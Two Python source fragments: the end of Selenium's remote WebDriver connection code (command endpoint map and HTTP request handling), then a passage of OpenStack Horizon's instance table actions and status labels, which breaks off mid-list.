Command.EXECUTE_SQL:
('POST', '/session/$sessionId/execute_sql'),
Command.GET_LOCATION:
('GET', '/session/$sessionId/location'),
Command.SET_LOCATION:
('POST', '/session/$sessionId/location'),
Command.GET_APP_CACHE:
('GET', '/session/$sessionId/application_cache'),
Command.GET_APP_CACHE_STATUS:
('GET', '/session/$sessionId/application_cache/status'),
Command.CLEAR_APP_CACHE:
('DELETE', '/session/$sessionId/application_cache/clear'),
Command.GET_NETWORK_CONNECTION:
('GET', '/session/$sessionId/network_connection'),
Command.SET_NETWORK_CONNECTION:
('POST', '/session/$sessionId/network_connection'),
Command.GET_LOCAL_STORAGE_ITEM:
('GET', '/session/$sessionId/local_storage/key/$key'),
Command.REMOVE_LOCAL_STORAGE_ITEM:
('DELETE', '/session/$sessionId/local_storage/key/$key'),
Command.GET_LOCAL_STORAGE_KEYS:
('GET', '/session/$sessionId/local_storage'),
Command.SET_LOCAL_STORAGE_ITEM:
('POST', '/session/$sessionId/local_storage'),
Command.CLEAR_LOCAL_STORAGE:
('DELETE', '/session/$sessionId/local_storage'),
Command.GET_LOCAL_STORAGE_SIZE:
('GET', '/session/$sessionId/local_storage/size'),
Command.GET_SESSION_STORAGE_ITEM:
('GET', '/session/$sessionId/session_storage/key/$key'),
Command.REMOVE_SESSION_STORAGE_ITEM:
('DELETE', '/session/$sessionId/session_storage/key/$key'),
Command.GET_SESSION_STORAGE_KEYS:
('GET', '/session/$sessionId/session_storage'),
Command.SET_SESSION_STORAGE_ITEM:
('POST', '/session/$sessionId/session_storage'),
Command.CLEAR_SESSION_STORAGE:
('DELETE', '/session/$sessionId/session_storage'),
Command.GET_SESSION_STORAGE_SIZE:
('GET', '/session/$sessionId/session_storage/size'),
Command.GET_LOG:
('POST', '/session/$sessionId/log'),
Command.GET_AVAILABLE_LOG_TYPES:
('GET', '/session/$sessionId/log/types'),
Command.CURRENT_CONTEXT_HANDLE:
('GET', '/session/$sessionId/context'),
Command.CONTEXT_HANDLES:
('GET', '/session/$sessionId/contexts'),
Command.SWITCH_TO_CONTEXT:
('POST', '/session/$sessionId/context'),
}
def execute(self, command, params):
"""
Send a command to the remote server.
Any path subtitutions required for the URL mapped to the command should be
included in the command parameters.
:Args:
- command - A string specifying the command to execute.
- params - A dictionary of named parameters to send with the command as
its JSON payload.
"""
command_info = self._commands[command]
assert command_info is not None, 'Unrecognised command %s' % command
data = utils.dump_json(params)
path = string.Template(command_info[1]).substitute(params)
url = '%s%s' % (self._url, path)
return self._request(command_info[0], url, body=data)
def _request(self, method, url, body=None):
"""
Send an HTTP request to the remote server.
:Args:
- method - A string for the HTTP method to send the request with.
- url - A string for the URL to send the request to.
- body - A string for request body. Ignored unless method is POST or PUT.
:Returns:
A dictionary with the server's parsed JSON response.
"""
LOGGER.debug('%s %s %s' % (method, url, body))
parsed_url = parse.urlparse(url)
if self.keep_alive:
headers = {"Connection": 'keep-alive', method: parsed_url.path,
"User-Agent": "Python http auth",
"Content-type": "application/json;charset=\"UTF-8\"",
"Accept": "application/json",
"Host": self._hostname}
if parsed_url.username:
auth = base64.standard_b64encode('%s:%s' %
(parsed_url.username, parsed_url.password)).replace('\n', '')
headers["Authorization"] = "Basic %s" % auth
if body and method != 'POST' and method != 'PUT':
body = None
try:
self._conn.request(method, parsed_url.path, body, headers)
resp = self._conn.getresponse()
except (httplib.HTTPException, socket.error):
self._conn.close()
raise
statuscode = resp.status
else:
password_manager = None
if parsed_url.username:
netloc = parsed_url.hostname
if parsed_url.port:
netloc += ":%s" % parsed_url.port
cleaned_url = parse.urlunparse((parsed_url.scheme,
netloc,
parsed_url.path,
parsed_url.params,
parsed_url.query,
parsed_url.fragment))
password_manager = url_request.HTTPPasswordMgrWithDefaultRealm()
password_manager.add_password(None,
"%s://%s" % (parsed_url.scheme, netloc),
parsed_url.username,
parsed_url.password)
request = Request(cleaned_url, data=body.encode('utf-8'), method=method)
else:
request = Request(url, data=body.encode('utf-8'), method=method)
request.add_header('Accept', 'application/json')
request.add_header('Content-Type', 'application/json;charset=UTF-8')
request.add_header('Host', self._hostname)
if password_manager:
opener = url_request.build_opener(url_request.HTTPRedirectHandler(),
HttpErrorHandler(),
url_request.HTTPBasicAuthHandler(password_manager))
else:
opener = url_request.build_opener(url_request.HTTPRedirectHandler(),
HttpErrorHandler())
resp = opener.open(request, timeout=self._timeout)
statuscode = resp.code
if not hasattr(resp, 'getheader'):
if hasattr(resp.headers, 'getheader'):
resp.getheader = lambda x: resp.headers.getheader(x)
elif hasattr(resp.headers, 'get'):
resp.getheader = lambda x: resp.headers.get(x)
data = resp.read()
try:
if 300 <= statuscode < 304:
return self._request('GET', resp.getheader('location'))
body = data.decode('utf-8').replace('\x00', '').strip()
if 399 < statuscode < 500:
return {'status': statuscode, 'value': body}
content_type = []
if resp.getheader('Content-Type') is not None:
content_type = resp.getheader('Content-Type').split(';')
if not any([x.startswith('image/png') for x in content_type]):
try:
data = utils.load_json(body.strip())
except ValueError:
if 199 < statuscode < 300:
status = ErrorCode.SUCCESS
else:
status = ErrorCode.UNKNOWN_ERROR
return {'status': status, 'value': body.strip()}
assert type(data) is dict, (
'Invalid server response body: %s' % body)
# Some of the drivers incorrectly return a response
# with no 'value' field when they should return null.
if 'value' not in data:
data['value'] = None
return data
else:
data = {'status': 0, 'value': body.strip()}
return data
finally:
LOGGER.debug("Finished Request")
resp.close()
| |
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.conf import settings
from django.core import urlresolvers
from django.http import HttpResponse # noqa
from django import shortcuts
from django import template
from django.template.defaultfilters import title # noqa
from django.utils.http import urlencode
from django.utils.translation import npgettext_lazy
from django.utils.translation import pgettext_lazy
from django.utils.translation import string_concat # noqa
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
import six
from horizon import conf
from horizon import exceptions
from horizon import messages
from horizon import tables
from horizon.templatetags import sizeformat
from horizon.utils import filters
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.access_and_security.floating_ips \
import workflows
from openstack_dashboard.dashboards.project.instances import tabs
from openstack_dashboard.dashboards.project.instances.workflows \
import resize_instance
from openstack_dashboard.dashboards.project.instances.workflows \
import update_instance
from openstack_dashboard import policy
LOG = logging.getLogger(__name__)
ACTIVE_STATES = ("ACTIVE",)
VOLUME_ATTACH_READY_STATES = ("ACTIVE", "SHUTOFF")
SNAPSHOT_READY_STATES = ("ACTIVE", "SHUTOFF", "PAUSED", "SUSPENDED")
POWER_STATES = {
0: "NO STATE",
1: "RUNNING",
2: "BLOCKED",
3: "PAUSED",
4: "SHUTDOWN",
5: "SHUTOFF",
6: "CRASHED",
7: "SUSPENDED",
8: "FAILED",
9: "BUILDING",
}
PAUSE = 0
UNPAUSE = 1
SUSPEND = 0
RESUME = 1
def is_deleting(instance):
task_state = getattr(instance, "OS-EXT-STS:task_state", None)
if not task_state:
return False
return task_state.lower() == "deleting"
class TerminateInstance(policy.PolicyTargetMixin, tables.BatchAction):
name = "terminate"
classes = ("btn-danger",)
icon = "remove"
policy_rules = (("compute", "compute:delete"),)
help_text = _("Terminated instances are not recoverable.")
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Terminate Instance",
u"Terminate Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Scheduled termination of Instance",
u"Scheduled termination of Instances",
count
)
def allowed(self, request, instance=None):
"""Allow terminate action if instance not currently being deleted."""
return not is_deleting(instance)
def action(self, request, obj_id):
api.nova.server_delete(request, obj_id)
class RebootInstance(policy.PolicyTargetMixin, tables.BatchAction):
name = "reboot"
classes = ('btn-danger', 'btn-reboot')
policy_rules = (("compute", "compute:reboot"),)
help_text = _("Restarted instances will lose any data"
" not saved in persistent storage.")
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Hard Reboot Instance",
u"Hard Reboot Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Hard Rebooted Instance",
u"Hard Rebooted Instances",
count
)
def allowed(self, request, instance=None):
if instance is not None:
return ((instance.status in ACTIVE_STATES
or instance.status == 'SHUTOFF')
and not is_deleting(instance))
else:
return True
def action(self, request, obj_id):
api.nova.server_reboot(request, obj_id, soft_reboot=False)
class SoftRebootInstance(RebootInstance):
name = "soft_reboot"
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Soft Reboot Instance",
u"Soft Reboot Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Soft Rebooted Instance",
u"Soft Rebooted Instances",
count
)
def action(self, request, obj_id):
api.nova.server_reboot(request, obj_id, soft_reboot=True)
class TogglePause(tables.BatchAction):
name = "pause"
icon = "pause"
@staticmethod
def action_present(count):
return (
ungettext_lazy(
u"Pause Instance",
u"Pause Instances",
count
),
ungettext_lazy(
u"Resume Instance",
u"Resume Instances",
count
),
)
@staticmethod
def action_past(count):
return (
ungettext_lazy(
u"Paused Instance",
u"Paused Instances",
count
),
ungettext_lazy(
u"Resumed Instance",
u"Resumed Instances",
count
),
)
def allowed(self, request, instance=None):
if not api.nova.extension_supported('AdminActions',
request):
return False
if not instance:
return False
self.paused = instance.status == "PAUSED"
if self.paused:
self.current_present_action = UNPAUSE
policy = (("compute", "compute_extension:admin_actions:unpause"),)
else:
self.current_present_action = PAUSE
policy = (("compute", "compute_extension:admin_actions:pause"),)
has_permission = True
policy_check = getattr(settings, "POLICY_CHECK_FUNCTION", None)
if policy_check:
has_permission = policy_check(
policy, request,
target={'project_id': getattr(instance, 'tenant_id', None)})
return (has_permission
and (instance.status in ACTIVE_STATES or self.paused)
and not is_deleting(instance))
def action(self, request, obj_id):
if self.paused:
api.nova.server_unpause(request, obj_id)
self.current_past_action = UNPAUSE
else:
api.nova.server_pause(request, obj_id)
self.current_past_action = PAUSE
class ToggleSuspend(tables.BatchAction):
name = "suspend"
classes = ("btn-suspend",)
@staticmethod
def action_present(count):
return (
ungettext_lazy(
u"Suspend Instance",
u"Suspend Instances",
count
),
ungettext_lazy(
u"Resume Instance",
u"Resume Instances",
count
),
)
@staticmethod
def action_past(count):
return (
ungettext_lazy(
u"Suspended Instance",
u"Suspended Instances",
count
),
ungettext_lazy(
u"Resumed Instance",
u"Resumed Instances",
count
),
)
def allowed(self, request, instance=None):
if not api.nova.extension_supported('AdminActions',
request):
return False
if not instance:
return False
self.suspended = instance.status == "SUSPENDED"
if self.suspended:
self.current_present_action = RESUME
policy = (("compute", "compute_extension:admin_actions:resume"),)
else:
self.current_present_action = SUSPEND
policy = (("compute", "compute_extension:admin_actions:suspend"),)
has_permission = True
policy_check = getattr(settings, "POLICY_CHECK_FUNCTION", None)
if policy_check:
has_permission = policy_check(
policy, request,
target={'project_id': getattr(instance, 'tenant_id', None)})
return (has_permission
and (instance.status in ACTIVE_STATES or self.suspended)
and not is_deleting(instance))
def action(self, request, obj_id):
if self.suspended:
api.nova.server_resume(request, obj_id)
self.current_past_action = RESUME
else:
api.nova.server_suspend(request, obj_id)
self.current_past_action = SUSPEND
class LaunchLink(tables.LinkAction):
name = "launch"
verbose_name = _("Launch Instance")
url = "horizon:project:instances:launch"
classes = ("ajax-modal", "btn-launch")
icon = "cloud-upload"
policy_rules = (("compute", "compute:create"),)
ajax = True
def __init__(self, attrs=None, **kwargs):
kwargs['preempt'] = True
super(LaunchLink, self).__init__(attrs, **kwargs)
def allowed(self, request, datum):
try:
limits = api.nova.tenant_absolute_limits(request, reserved=True)
instances_available = limits['maxTotalInstances'] \
- limits['totalInstancesUsed']
cores_available = limits['maxTotalCores'] \
- limits['totalCoresUsed']
ram_available = limits['maxTotalRAMSize'] - limits['totalRAMUsed']
if instances_available <= 0 or cores_available <= 0 \
or ram_available <= 0:
if "disabled" not in self.classes:
self.classes = [c for c in self.classes] + ['disabled']
self.verbose_name = string_concat(self.verbose_name, ' ',
_("(Quota exceeded)"))
else:
self.verbose_name = _("Launch Instance")
classes = [c for c in self.classes if c != "disabled"]
self.classes = classes
except Exception:
LOG.exception("Failed to retrieve quota information")
# If we can't get the quota information, leave it to the
# API to check when launching
return True # The action should always be displayed
def single(self, table, request, object_id=None):
self.allowed(request, None)
return HttpResponse(self.render())
class LaunchLinkNG(LaunchLink):
name = "launch-ng"
url = "horizon:project:instances:index"
ajax = False
classes = ("btn-launch", )
def get_default_attrs(self):
url = urlresolvers.reverse(self.url)
ngclick = "modal.openLaunchInstanceWizard(" \
"{ successUrl: '%s' })" % url
self.attrs.update({
'ng-controller': 'LaunchInstanceModalController as modal',
'ng-click': ngclick
})
return super(LaunchLinkNG, self).get_default_attrs()
def get_link_url(self, datum=None):
return "javascript:void(0);"
class EditInstance(policy.PolicyTargetMixin, tables.LinkAction):
name = "edit"
verbose_name = _("Edit Instance")
url = "horizon:project:instances:update"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("compute", "compute:update"),)
def get_link_url(self, project):
return self._get_link_url(project, 'instance_info')
def _get_link_url(self, project, step_slug):
base_url = urlresolvers.reverse(self.url, args=[project.id])
next_url = self.table.get_full_url()
params = {"step": step_slug,
update_instance.UpdateInstance.redirect_param_name: next_url}
param = urlencode(params)
return "?".join([base_url, param])
def allowed(self, request, instance):
return not is_deleting(instance)
class EditInstanceSecurityGroups(EditInstance):
name = "edit_secgroups"
verbose_name = _("Edit Security Groups")
def get_link_url(self, project):
return self._get_link_url(project, 'update_security_groups')
def allowed(self, request, instance=None):
return (instance.status in ACTIVE_STATES and
not is_deleting(instance) and
request.user.tenant_id == instance.tenant_id)
class CreateSnapshot(policy.PolicyTargetMixin, tables.LinkAction):
name = "snapshot"
verbose_name = _("Create Snapshot")
url = "horizon:project:images:snapshots:create"
classes = ("ajax-modal",)
icon = "camera"
policy_rules = (("compute", "compute:snapshot"),)
def allowed(self, request, instance=None):
return instance.status in SNAPSHOT_READY_STATES \
and not is_deleting(instance)
class ConsoleLink(policy.PolicyTargetMixin, tables.LinkAction):
name = "console"
verbose_name = _("Console")
url = "horizon:project:instances:detail"
classes = ("btn-console",)
policy_rules = (("compute", "compute_extension:consoles"),)
def allowed(self, request, instance=None):
# We check if ConsoleLink is allowed only if settings.CONSOLE_TYPE is
# not set at all, or if it's set to any value other than None or False.
return bool(getattr(settings, 'CONSOLE_TYPE', True)) and \
instance.status in ACTIVE_STATES and not is_deleting(instance)
def get_link_url(self, datum):
base_url = super(ConsoleLink, self).get_link_url(datum)
tab_query_string = tabs.ConsoleTab(
tabs.InstanceDetailTabs).get_query_string()
return "?".join([base_url, tab_query_string])
class LogLink(policy.PolicyTargetMixin, tables.LinkAction):
name = "log"
verbose_name = _("View Log")
url = "horizon:project:instances:detail"
classes = ("btn-log",)
policy_rules = (("compute", "compute_extension:console_output"),)
def allowed(self, request, instance=None):
return instance.status in ACTIVE_STATES and not is_deleting(instance)
def get_link_url(self, datum):
base_url = super(LogLink, self).get_link_url(datum)
tab_query_string = tabs.LogTab(
tabs.InstanceDetailTabs).get_query_string()
return "?".join([base_url, tab_query_string])
class ResizeLink(policy.PolicyTargetMixin, tables.LinkAction):
name = "resize"
verbose_name = _("Resize Instance")
url = "horizon:project:instances:resize"
classes = ("ajax-modal", "btn-resize")
policy_rules = (("compute", "compute:resize"),)
def get_link_url(self, project):
return self._get_link_url(project, 'flavor_choice')
def _get_link_url(self, project, step_slug):
base_url = urlresolvers.reverse(self.url, args=[project.id])
next_url = self.table.get_full_url()
params = {"step": step_slug,
resize_instance.ResizeInstance.redirect_param_name: next_url}
param = urlencode(params)
return "?".join([base_url, param])
def allowed(self, request, instance):
return ((instance.status in ACTIVE_STATES
or instance.status == 'SHUTOFF')
and not is_deleting(instance))
class ConfirmResize(policy.PolicyTargetMixin, tables.Action):
name = "confirm"
verbose_name = _("Confirm Resize/Migrate")
classes = ("btn-confirm", "btn-action-required")
policy_rules = (("compute", "compute:confirm_resize"),)
def allowed(self, request, instance):
return instance.status == 'VERIFY_RESIZE'
def single(self, table, request, instance):
api.nova.server_confirm_resize(request, instance)
class RevertResize(policy.PolicyTargetMixin, tables.Action):
name = "revert"
verbose_name = _("Revert Resize/Migrate")
classes = ("btn-revert", "btn-action-required")
policy_rules = (("compute", "compute:revert_resize"),)
def allowed(self, request, instance):
return instance.status == 'VERIFY_RESIZE'
def single(self, table, request, instance):
api.nova.server_revert_resize(request, instance)
class RebuildInstance(policy.PolicyTargetMixin, tables.LinkAction):
name = "rebuild"
verbose_name = _("Rebuild Instance")
classes = ("btn-rebuild", "ajax-modal")
url = "horizon:project:instances:rebuild"
policy_rules = (("compute", "compute:rebuild"),)
def allowed(self, request, instance):
return ((instance.status in ACTIVE_STATES
or instance.status == 'SHUTOFF')
and not is_deleting(instance))
def get_link_url(self, datum):
instance_id = self.table.get_object_id(datum)
return urlresolvers.reverse(self.url, args=[instance_id])
class DecryptInstancePassword(tables.LinkAction):
name = "decryptpassword"
verbose_name = _("Retrieve Password")
classes = ("btn-decrypt", "ajax-modal")
url = "horizon:project:instances:decryptpassword"
def allowed(self, request, instance):
enable = getattr(settings,
'OPENSTACK_ENABLE_PASSWORD_RETRIEVE',
False)
return (enable
and (instance.status in ACTIVE_STATES
or instance.status == 'SHUTOFF')
and not is_deleting(instance)
and get_keyname(instance) is not None)
def get_link_url(self, datum):
instance_id = self.table.get_object_id(datum)
keypair_name = get_keyname(datum)
return urlresolvers.reverse(self.url, args=[instance_id,
keypair_name])
class AssociateIP(policy.PolicyTargetMixin, tables.LinkAction):
name = "associate"
verbose_name = _("Associate Floating IP")
url = "horizon:project:access_and_security:floating_ips:associate"
classes = ("ajax-modal",)
icon = "link"
policy_rules = (("compute", "network:associate_floating_ip"),)
def allowed(self, request, instance):
if not api.network.floating_ip_supported(request):
return False
if api.network.floating_ip_simple_associate_supported(request):
return False
if instance.status == "ERROR":
return False
for addresses in instance.addresses.values():
for address in addresses:
if address.get('OS-EXT-IPS:type') == "floating":
return False
return not is_deleting(instance)
def get_link_url(self, datum):
base_url = urlresolvers.reverse(self.url)
next_url = self.table.get_full_url()
params = {
"instance_id": self.table.get_object_id(datum),
workflows.IPAssociationWorkflow.redirect_param_name: next_url}
params = urlencode(params)
return "?".join([base_url, params])
class SimpleAssociateIP(policy.PolicyTargetMixin, tables.Action):
name = "associate-simple"
verbose_name = _("Associate Floating IP")
icon = "link"
policy_rules = (("compute", "network:associate_floating_ip"),)
def allowed(self, request, instance):
if not api.network.floating_ip_simple_associate_supported(request):
return False
if instance.status == "ERROR":
return False
return not is_deleting(instance)
def single(self, table, request, instance_id):
try:
# target_id is port_id for Neutron and instance_id for Nova Network
# (Neutron API wrapper returns a 'portid_fixedip' string)
target_id = api.network.floating_ip_target_get_by_instance(
request, instance_id).split('_')[0]
fip = api.network.tenant_floating_ip_allocate(request)
api.network.floating_ip_associate(request, fip.id, target_id)
messages.success(request,
_("Successfully associated floating IP: %s")
% fip.ip)
except Exception:
exceptions.handle(request,
_("Unable to associate floating IP."))
return shortcuts.redirect(request.get_full_path())
class SimpleDisassociateIP(policy.PolicyTargetMixin, tables.Action):
name = "disassociate"
verbose_name = _("Disassociate Floating IP")
classes = ("btn-danger", "btn-disassociate",)
policy_rules = (("compute", "network:disassociate_floating_ip"),)
def allowed(self, request, instance):
if not api.network.floating_ip_supported(request):
return False
if not conf.HORIZON_CONFIG["simple_ip_management"]:
return False
for addresses in instance.addresses.values():
for address in addresses:
if address.get('OS-EXT-IPS:type') == "floating":
return not is_deleting(instance)
return False
def single(self, table, request, instance_id):
try:
# target_id is port_id for Neutron and instance_id for Nova Network
# (Neutron API wrapper returns a 'portid_fixedip' string)
targets = api.network.floating_ip_target_list_by_instance(
request, instance_id)
target_ids = [t.split('_')[0] for t in targets]
fips = [fip for fip in api.network.tenant_floating_ip_list(request)
if fip.port_id in target_ids]
# Removing multiple floating IPs at once doesn't work, so this pops
# off the first one.
if fips:
fip = fips.pop()
api.network.floating_ip_disassociate(request, fip.id)
messages.success(request,
_("Successfully disassociated "
"floating IP: %s") % fip.ip)
else:
messages.info(request, _("No floating IPs to disassociate."))
except Exception:
exceptions.handle(request,
_("Unable to disassociate floating IP."))
return shortcuts.redirect(request.get_full_path())
def instance_fault_to_friendly_message(instance):
fault = getattr(instance, 'fault', {})
message = fault.get('message', _("Unknown"))
default_message = _("Please try again later [Error: %s].") % message
fault_map = {
'NoValidHost': _("There is not enough capacity for this "
"flavor in the selected availability zone. "
"Try again later or select a different availability "
"zone.")
}
return fault_map.get(message, default_message)
def get_instance_error(instance):
if instance.status.lower() != 'error':
return None
message = instance_fault_to_friendly_message(instance)
preamble = _('Failed to perform requested operation on instance "%s", the '
'instance has an error status') % instance.name or instance.id
message = string_concat(preamble, ': ', message)
return message
class UpdateRow(tables.Row):
ajax = True
def get_data(self, request, instance_id):
instance = api.nova.server_get(request, instance_id)
try:
instance.full_flavor = api.nova.flavor_get(request,
instance.flavor["id"])
except Exception:
exceptions.handle(request,
_('Unable to retrieve flavor information '
'for instance "%s".') % instance_id,
ignore=True)
error = get_instance_error(instance)
if error:
messages.error(request, error)
return instance
class StartInstance(policy.PolicyTargetMixin, tables.BatchAction):
name = "start"
classes = ('btn-confirm',)
policy_rules = (("compute", "compute:start"),)
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Start Instance",
u"Start Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Started Instance",
u"Started Instances",
count
)
def allowed(self, request, instance):
return ((instance is None) or
(instance.status in ("SHUTDOWN", "SHUTOFF", "CRASHED")))
def action(self, request, obj_id):
api.nova.server_start(request, obj_id)
class StopInstance(policy.PolicyTargetMixin, tables.BatchAction):
name = "stop"
classes = ('btn-danger',)
policy_rules = (("compute", "compute:stop"),)
help_text = _("To power off a specific instance.")
@staticmethod
def action_present(count):
return npgettext_lazy(
"Action to perform (the instance is currently running)",
u"Shut Off Instance",
u"Shut Off Instances",
count
)
@staticmethod
def action_past(count):
return npgettext_lazy(
"Past action (the instance is currently already Shut Off)",
u"Shut Off Instance",
u"Shut Off Instances",
count
)
def allowed(self, request, instance):
return ((instance is None)
or ((get_power_state(instance) in ("RUNNING", "SUSPENDED"))
and not is_deleting(instance)))
def action(self, request, obj_id):
api.nova.server_stop(request, obj_id)
class LockInstance(policy.PolicyTargetMixin, tables.BatchAction):
name = "lock"
policy_rules = (("compute", "compute_extension:admin_actions:lock"),)
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Lock Instance",
u"Lock Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Locked Instance",
u"Locked Instances",
count
)
# TODO(akrivoka): When the lock status is added to nova, revisit this
# to only allow unlocked instances to be locked
def allowed(self, request, instance):
if not api.nova.extension_supported('AdminActions', request):
return False
return True
def action(self, request, obj_id):
api.nova.server_lock(request, obj_id)
class UnlockInstance(policy.PolicyTargetMixin, tables.BatchAction):
name = "unlock"
policy_rules = (("compute", "compute_extension:admin_actions:unlock"),)
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Unlock Instance",
u"Unlock Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Unlocked Instance",
u"Unlocked Instances",
count
)
# TODO(akrivoka): When the lock status is added to nova, revisit this
# to only allow locked instances to be unlocked
def allowed(self, request, instance):
if not api.nova.extension_supported('AdminActions', request):
return False
return True
def action(self, request, obj_id):
api.nova.server_unlock(request, obj_id)
class AttachInterface(policy.PolicyTargetMixin, tables.LinkAction):
name = "attach_interface"
verbose_name = _("Attach Interface")
classes = ("btn-confirm", "ajax-modal")
url = "horizon:project:instances:attach_interface"
policy_rules = (("compute", "compute_extension:attach_interfaces"),)
def allowed(self, request, instance):
return ((instance.status in ACTIVE_STATES
or instance.status == 'SHUTOFF')
and not is_deleting(instance)
and api.base.is_service_enabled(request, 'network'))
def get_link_url(self, datum):
instance_id = self.table.get_object_id(datum)
return urlresolvers.reverse(self.url, args=[instance_id])
# TODO(lyj): the policy for detach interface not exists in nova.json,
# once it's added, it should be added here.
class DetachInterface(policy.PolicyTargetMixin, tables.LinkAction):
name = "detach_interface"
verbose_name = _("Detach Interface")
classes = ("btn-confirm", "ajax-modal")
url = "horizon:project:instances:detach_interface"
def allowed(self, request, instance):
return ((instance.status in ACTIVE_STATES
or instance.status == 'SHUTOFF')
and not is_deleting(instance)
and api.base.is_service_enabled(request, 'network'))
def get_link_url(self, datum):
instance_id = self.table.get_object_id(datum)
return urlresolvers.reverse(self.url, args=[instance_id])
def get_ips(instance):
template_name = 'project/instances/_instance_ips.html'
ip_groups = {}
for ip_group, addresses in six.iteritems(instance.addresses):
ip_groups[ip_group] = {}
ip_groups[ip_group]["floating"] = []
ip_groups[ip_group]["non_floating"] = []
for address in addresses:
if ('OS-EXT-IPS:type' in address and
address['OS-EXT-IPS:type'] == "floating"):
ip_groups[ip_group]["floating"].append(address)
else:
ip_groups[ip_group]["non_floating"].append(address)
context = {
"ip_groups": ip_groups,
}
return template.loader.render_to_string(template_name, context)
def get_size(instance):
if hasattr(instance, "full_flavor"):
template_name = 'project/instances/_instance_flavor.html'
size_ram = sizeformat.mb_float_format(instance.full_flavor.ram)
if instance.full_flavor.disk > 0:
size_disk = sizeformat.diskgbformat(instance.full_flavor.disk)
else:
size_disk = _("%s GB") % "0"
context = {
"name": instance.full_flavor.name,
"id": instance.id,
"size_disk": size_disk,
"size_ram": size_ram,
"vcpus": instance.full_flavor.vcpus,
"flavor_id": instance.full_flavor.id
}
return template.loader.render_to_string(template_name, context)
return _("Not available")
def get_keyname(instance):
if hasattr(instance, "key_name"):
keyname = instance.key_name
return keyname
return _("Not available")
def get_power_state(instance):
return POWER_STATES.get(getattr(instance, "OS-EXT-STS:power_state", 0), '')
STATUS_DISPLAY_CHOICES = (
("deleted", pgettext_lazy("Current status of an Instance", u"Deleted")),
("active", pgettext_lazy("Current status of an Instance", u"Active")),
("shutoff", pgettext_lazy("Current status of an Instance", u"Shutoff")),
("suspended", pgettext_lazy("Current status of an Instance",
u"Suspended")),
("paused", pgettext_lazy("Current status of an Instance", u"Paused")),
("error", pgettext_lazy("Current status of an Instance", u"Error")),
("resize", pgettext_lazy("Current status of an Instance",
u"Resize/Migrate")),
("verify_resize", pgettext_lazy("Current status of an Instance",
u"Confirm or Revert Resize/Migrate")),
("revert_resize", pgettext_lazy(
"Current status of an Instance", u"Revert Resize/Migrate")),
("reboot", pgettext_lazy("Current status of an Instance", u"Reboot")),
("hard_reboot", pgettext_lazy("Current status of an Instance",
u"Hard Reboot")),
("password", pgettext_lazy("Current status of an Instance", u"Password")),
("rebuild", pgettext_lazy("Current status of an Instance", u"Rebuild")),
("migrating", pgettext_lazy("Current status of an Instance",
u"Migrating")),
("build", pgettext_lazy("Current status of an Instance", u"Build")),
("rescue", pgettext_lazy("Current status of an Instance", u"Rescue")),
("deleted", pgettext_lazy("Current status of an Instance", u"Deleted")),
("soft_deleted", pgettext_lazy("Current status of an Instance",
u"Soft Deleted")),
("shelved", pgettext_lazy("Current status of an Instance", u"Shelved")),
("shelved_offloaded", pgettext_lazy("Current status of an Instance",
u"Shelved Offloaded")),
)
TASK_DISPLAY_NONE = pgettext_lazy("Task status of an Instance", u"None")
# Mapping of task states taken from Nova's nova/compute/task_states.py
TASK_DISPLAY_CHOICES = (
("scheduling", pgettext_lazy("Task status of an Instance",
u"Scheduling")),
("block_device_mapping", pgettext_lazy("Task status of an Instance",
u"Block Device Mapping")),
("networking", pgettext_lazy("Task status of an Instance",
u"Networking")),
("spawning", pgettext_lazy("Task status of an Instance", u"Spawning")),
("image_snapshot", pgettext_lazy("Task status of an Instance",
u"Snapshotting")),
("image_snapshot_pending", pgettext_lazy("Task status of an Instance",
u"Image Snapshot Pending")),
("image_pending_upload", pgettext_lazy("Task status of an Instance",
u"Image Pending Upload")),
("image_uploading", pgettext_lazy("Task status of an Instance",
u"Image Uploading")),
("image_backup", pgettext_lazy("Task status of an Instance",
u"Image Backup")),
("updating_password", pgettext_lazy("Task status of an Instance",
u"Updating Password")),
("resize_prep", pgettext_lazy("Task status of an Instance",
u"Preparing Resize or Migrate")),
("resize_migrating", pgettext_lazy("Task status of an Instance",
u"Resizing or Migrating")),
("resize_migrated", pgettext_lazy("Task status of an Instance",
u"Resized or Migrated")),
("resize_finish", pgettext_lazy("Task status of an Instance",
u"Finishing Resize or Migrate")),
("resize_reverting", pgettext_lazy("Task status of an Instance",
u"Reverting Resize or Migrate")),
("resize_confirming", pgettext_lazy("Task status of an Instance",
u"Confirming Resize or Migrate")),
("rebooting", pgettext_lazy("Task status of an Instance", u"Rebooting")),
("reboot_pending", pgettext_lazy("Task status of an Instance",
u"Reboot Pending")),
("reboot_started", pgettext_lazy("Task status of an Instance",
u"Reboot Started")),
("rebooting_hard", pgettext_lazy("Task status of an Instance",
u"Rebooting Hard")),
("reboot_pending_hard", pgettext_lazy("Task status of an Instance",
u"Reboot Pending Hard")),
("reboot_started_hard", pgettext_lazy("Task status of an Instance",
u"Reboot Started Hard")),
("pausing", pgettext_lazy("Task status of an Instance", u"Pausing")),
("unpausing", pgettext_lazy("Task status of an Instance", u"Resuming")),
("suspending", pgettext_lazy("Task status of an Instance",
u"Suspending")),
("resuming", pgettext_lazy("Task status of an Instance", u"Resuming")),
("powering-off", pgettext_lazy("Task status of an Instance",
u"Powering Off")),
("powering-on", pgettext_lazy("Task status of an Instance",
u"Powering On")),
("rescuing", pgettext_lazy("Task status of an Instance", u"Rescuing")),
